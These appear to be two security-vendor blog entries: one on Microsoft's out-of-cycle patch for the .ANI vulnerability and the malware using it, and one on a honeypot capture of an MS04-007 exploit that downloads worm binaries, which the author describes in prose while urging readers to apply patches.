Perhaps due to the increasing number of reports of malware taking advantage of this recently exploited Windows vulnerability, Microsoft is set to release a security patch this Tuesday, April 3.

Normally, Microsoft releases its monthly security bulletins every second Tuesday of the month (aka “Patch Tuesday”). Tomorrow’s release is thus considered an out-of-cycle release. Note that Microsoft’s last out-of-cycle release happened last September for the Vector Markup Language (VML) vulnerability.

Among the mentioned malware exploiting this .ANI vulnerability is TROJ_ANICMOO.AX, which was already discussed in this blog entry. More recently, TrendLabs has detected PE_FUBALCA.A-O, a file infector that targets Web site related files (HTML, JSP, ASP, etc.) in order to inject a URL where an .ANI exploit code is located.

Trend Micro already protects users against similar exploits with the generic detection pattern EXPL_ANICMOO.GEN. However, as always, users are still advised to download and install the security patch as soon as it is released.

It’s been a while since I got an interesting packet capture from one of our honeypot. The packet capture honeypot intercepted a packet exploiting MS04-007 or the ASN.1 vulnerability. I far as I can remember, this attack was first seen June 2005 and we have the detections WORM_RBOT.BJF and WORM_RBOT.BJI. Note that this vulnerability is directly related to http or port 80, thus this attack can bypass firewall and it’s considered to be a web threat. The image below shows first few bytes of the packet.



The data is base64-encoded so we must extract the decoded data to see its payload.



The packet tries to download and execute two binaries (msd.exe and wuauclt10.exe) through ftp from two different IP addresses. I was able to get a copy of the first downloaded binary but failed to have the second one. The binary file, msd.exe, is related to the WORM_RBOT family and is already submitted to the Service team for the necessary solutions. Now, I came to realize that there are still unpatched machines connected to the internet and become zombies for malware authors. If only the necessary software security patch were used, then this attack will be prevented and not be used by the malware authors as it will be of no use. As a friendly reminder, please apply security patches to your systems to be secured from known attacks such as the one mentioned in this entry.

Update: This is to be detected as WORM_RBOT.DLC.